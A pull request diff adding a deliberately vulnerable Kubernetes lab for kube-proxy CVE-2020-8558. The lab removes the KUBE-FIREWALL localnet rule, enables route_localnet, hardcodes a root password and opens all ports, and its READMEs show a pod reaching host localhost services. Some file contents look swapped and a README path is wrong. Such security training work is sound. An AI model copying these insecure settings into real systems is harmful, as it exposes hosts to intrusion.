Merge pull request #95 from leveryd/main

feat: add kube-proxy CVE-2020-8558 scenario

Author: leveryd

kubernetes/kube-proxy/CVE-2020-8558/README.md

@@ -0,0 +1,81 @@
+# kube-proxy CVE-2020-8558 Vulnerable Environment
+
+English | [中文](./README_CN.md)
+
+## Description
+
+This is a scenario used to build the kube-proxy "CVE-2020-8558" vulnerability environment.
+
+After building the environment with Terraform, users in pod can access host's services which is bind on only "127.0.0.1" address.
+
+## Deployment Environment
+
+Execute the following command in the container
+
+```shell
+cd /TerraformGoat/kubernetes/kubelet/log-mount
+```
+
+Configure Alibaba Cloud Access Credentials
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-hongkong"
+```
+
+> You can create and view your AccessKey on the [AccessKey page](https://ram.console.aliyun.com/manage/ak) of the Alibaba Cloud console
+
+Deploy Vulnerable Environment
+
+```shell
+terraform init
+terraform apply
+```
+
+> When the terminal prompts `Enter a value:`, enter `yes`
+
+![img](../../../images/20220622-174141.jpg)
+
+After the environment is set up, You can see the kubelet api access address of the scenario at Outputs.
+
+## Vulnerability Utilization
+
+first, we need to log in node host via ssh, the default password is "Huoxian@123"
+
+```shell
+➜  ~ ssh root@8.210.237.96  // 8.210.237.96 is node ip, you need replace it with what is in above "Outputs"
+```
+
+then, we can log in pod which have been created
+
+```shell
+root@iZj6ce4bmwc11otulk7i3rZ:~# kubectl exec -ti test-pod -- sh      // test-pod is pod name
+sh-4.2#
+```
+
+now, we can access host's services which is bind on only "127.0.0.1" address.
+
+```shell
+root@iZj6ce4bmwc11otulk7i3rZ:~# netstat -antp|grep 127.0.0.1
+tcp        0      0 127.0.0.1:37953         0.0.0.0:*               LISTEN      2551/containerd
+tcp        0      0 127.0.0.1:41351         0.0.0.0:*               LISTEN      15900/kubelet
+tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      15900/kubelet
+...
+```
+
+for example，we can access host's kubelet metrics service in pod.
+
+```shell
+sh-4.2# curl 127.0.0.1:10249/metrics --interface eth0
+# HELP apiserver_audit_event_total [ALPHA] Counter of audit events generated and sent to the audit backend.
+# TYPE apiserver_audit_event_total counter
+apiserver_audit_event_total 0
+...
+```
+
+## Destroy the environment
+
+```shell
+terraform destroy
+```

kubernetes/kube-proxy/CVE-2020-8558/README_CN.md

@@ -0,0 +1,81 @@
+# kube-proxy CVE-2020-8558漏洞环境
+
+[English](./README.md) | 中文
+
+## 描述信息
+
+这是一个用于构建kubernetes kube-proxy组件CVE-2020-8558漏洞的靶场。
+
+使用 terraform 构建环境后，用户在容器可以通过 kubelet组件CVE-2020-8558漏洞 访问到宿主机只绑定在127.0.0.1的服务。
+
+## 环境搭建
+
+在容器中执行以下命令
+
+```shell
+cd /TerraformGoat/kubernetes/kube-proxy/CVE-2020-8558
+```
+
+配置阿里云访问凭证
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-hongkong"
+```
+
+> 在阿里云控制台的 [AccessKey 页面](https://ram.console.aliyun.com/manage/ak) 可以创建和查看您的 AccessKey
+
+部署靶场
+
+```shell
+terraform init
+terraform apply
+```
+
+> 在终端提示 `Enter a value:` 时，输入 `yes` 即可
+
+![img](../../../images/20220622-174141.jpg)
+
+环境搭建完后，在 Outputs 处可以看到节点的访问地址。
+
+## 漏洞利用
+
+首先，我们先登陆到节点机器上，密码默认是 Huoxian@123
+
+```shell
+➜  ~ ssh root@8.210.237.96  // 8.210.237.96 是节点的访问地址，你需要替换成 Outputs 中的地址。
+```
+
+然后进入到已经创建好的pod shell环境
+
+```shell
+root@iZj6ce4bmwc11otulk7i3rZ:~# kubectl exec -ti test-pod -- sh      // test-pod 是pod名
+sh-4.2#
+```
+
+下面就可以在pod中尝试访问宿主机上监听在 127.0.0.1 的服务了
+
+```shell
+root@iZj6ce4bmwc11otulk7i3rZ:~# netstat -antp|grep 127.0.0.1
+tcp        0      0 127.0.0.1:37953         0.0.0.0:*               LISTEN      2551/containerd
+tcp        0      0 127.0.0.1:41351         0.0.0.0:*               LISTEN      15900/kubelet
+tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      15900/kubelet
+...
+```
+
+比如，在pod可以访问到宿主机上的kubelet metrics服务
+
+```shell
+sh-4.2# curl 127.0.0.1:10249/metrics --interface eth0
+# HELP apiserver_audit_event_total [ALPHA] Counter of audit events generated and sent to the audit backend.
+# TYPE apiserver_audit_event_total counter
+apiserver_audit_event_total 0
+...
+```
+
+## 销毁环境
+
+```shell
+terraform destroy
+```

kubernetes/kube-proxy/CVE-2020-8558/main.tf

@@ -0,0 +1,95 @@
+resource "alicloud_instance" "instance" {
+  security_groups            = alicloud_security_group.group.*.id
+  instance_type              = data.alicloud_instance_types.types_ds.instance_types.0.id
+  image_id                   = "ubuntu_18_04_64_20G_alibase_20190624.vhd"
+  instance_name              = "huocorp_terraform_goat_instance"
+  vswitch_id                 = alicloud_vswitch.vswitch.id
+  system_disk_size           = 20
+  internet_max_bandwidth_out = 100
+  password                   = "Huoxian@123" // 虚拟机密码
+
+  provisioner "file" {
+    connection {
+      type     = "ssh"
+      host     = self.public_ip
+      user     = "root"
+      password = "Huoxian@123"
+      timeout  = "1h"
+    }
+
+    source      = "resource/kk"
+    destination = "/root/kk" // deploy_k8s.sh用来安装k8s
+  }
+
+  provisioner "file" {
+    connection {
+      type     = "ssh"
+      host     = self.public_ip
+      user     = "root"
+      password = "Huoxian@123"
+      timeout  = "1h"
+    }
+
+    source      = "resource/pod.yaml"
+    destination = "/root/pod.yaml"
+  }
+
+  provisioner "remote-exec" {
+    connection {
+      type     = "ssh"
+      host     = self.public_ip
+      user     = "root"
+      password = "Huoxian@123"
+      timeout  = "1h"
+    }
+    script = "resource/deploy_k8s.sh"
+  }
+
+  depends_on = [
+    alicloud_security_group.group,
+    alicloud_vswitch.vswitch,
+  ]
+}
+
+resource "alicloud_security_group" "group" {
+  name   = "huocorp_terraform_goat_security_group"
+  vpc_id = alicloud_vpc.vpc.id
+  depends_on = [
+    alicloud_vpc.vpc
+  ]
+}
+
+resource "alicloud_security_group_rule" "allow_all_tcp" {
+  type              = "ingress"
+  ip_protocol       = "tcp"
+  nic_type          = "intranet"
+  policy            = "accept"
+  port_range        = "1/65535" // 允许访问所有端口
+  priority          = 1
+  security_group_id = alicloud_security_group.group.id
+  cidr_ip           = "0.0.0.0/0"
+  depends_on = [
+    alicloud_security_group.group
+  ]
+}
+
+resource "alicloud_vpc" "vpc" {
+  vpc_name   = "huocorp_terraform_goat_vpc"
+  cidr_block = "172.16.0.0/16"
+}
+
+resource "alicloud_vswitch" "vswitch" {
+  vpc_id       = alicloud_vpc.vpc.id
+  cidr_block   = "172.16.0.0/24"
+  zone_id      = "cn-hongkong-b" // https://www.alibabacloud.com/help/en/virtual-private-cloud/latest/describeregions
+  vswitch_name = "huocorp_terraform_goat_vswitch"
+  depends_on = [
+    alicloud_vpc.vpc
+  ]
+}
+
+// kubekey安装k8s集群，配置要求至少 2核4g
+data "alicloud_instance_types" "types_ds" {
+  cpu_core_count = 2
+  memory_size    = 4
+}

kubernetes/kube-proxy/CVE-2020-8558/outputs.tf

@@ -0,0 +1,4 @@
+output "kubelet_log-mount_lab_address_link" {
+  value       = "ssh root@${alicloud_instance.instance.public_ip}"
+  description = "kube-proxy 'CVE-2020-8558' lab address link."
+}

kubernetes/kube-proxy/CVE-2020-8558/resource/deploy_k8s.sh

@@ -0,0 +1,52 @@
+#!/bin/bash
+function deploy_k8s(){
+  export KKZONE=cn
+
+  # /root/kk 已经通过terrraform provisioner拷贝主机
+  chmod 755 /root/kk
+
+  apt-get update -y
+  apt-get install -y conntrack ebtables socat
+
+  /root/kk create cluster --with-kubernetes v1.21.5 -y
+}
+
+#
+function deploy_vulnerable_env(){
+
+  kubectl_bin_path=/usr/local/bin/kubectl
+  kubelet_arg_path=/var/lib/kubelet/kubeadm-flags.env
+  yaml_path=/root/pod.yaml
+
+  # 使用docker网络
+  sed -i 's/--network-plugin=cni//' $kubelet_arg_path
+  service kubelet restart
+  sleep 60
+  echo '[done] "kubelet" restart'
+
+  # 模拟漏洞
+  sysctl -w net.ipv4.conf.all.route_localnet=1
+  sysctl -w net.ipv4.conf.default.route_localnet=1
+  sysctl -w net.ipv4.conf.docker0.route_localnet=1
+
+  sysctl -w net.ipv4.conf.all.accept_local=1
+  sysctl -w net.ipv4.conf.default.accept_local=1
+  sysctl -w net.ipv4.conf.docker0.accept_local=1
+
+  nsenter -n -t 1 iptables -D KUBE-FIREWALL 2 # -A KUBE-FIREWALL ! -s 127.0.0.0/8 -d 127.0.0.0/8 -m comment --comment "block incoming localnet connections" -m conntrack ! --ctstate RELATED,ESTABLISHED,DNAT -j DROP
+
+  # 宿主机上有部分服务在 127.0.0.1 监听
+  # root@iZj6ce4bmwc11otulk7i3rZ:~# netstat -antp|grep 127.0.0.1
+  # tcp        0      0 127.0.0.1:37953         0.0.0.0:*               LISTEN      2551/containerd
+  # tcp        0      0 127.0.0.1:41351         0.0.0.0:*               LISTEN      15900/kubelet
+  # tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      15900/kubelet
+
+  # 部署恶意pod
+  $kubectl_bin_path apply -f $yaml_path
+  sleep 60
+  echo '[done] "test-pod" create'
+}
+
+deploy_k8s
+echo "[done] 'k8s cluster' deploy" && sleep 60
+deploy_vulnerable_env

kubernetes/kube-proxy/CVE-2020-8558/resource/kk

@@ -0,0 +1,13 @@
+apiVersion: v1
+kind: Pod
+metadata:
+  name: test-pod
+spec:
+  tolerations:
+    - key: "node-role.kubernetes.io/master"
+      operator: "Exists"
+  containers:
+    - name: test-pod
+      image: registry.cn-hangzhou.aliyuncs.com/tscuite/bachang:webgoat-v1
+      command: [sh, -c, "tail -f /dev/null"]
+      imagePullPolicy: IfNotPresent

kubernetes/kube-proxy/CVE-2020-8558/resource/pod.yaml

@@ -0,0 +1,13 @@
+terraform {
+  required_providers {
+    alicloud = {
+      source  = "aliyun/alicloud"
+      version = "1.163.0"
+    }
+  }
+}
+
+provider "alicloud" {
+  profile = "default"
+  region  = "cn-hongkong" // https://help.aliyun.com/document_detail/40654.html
+}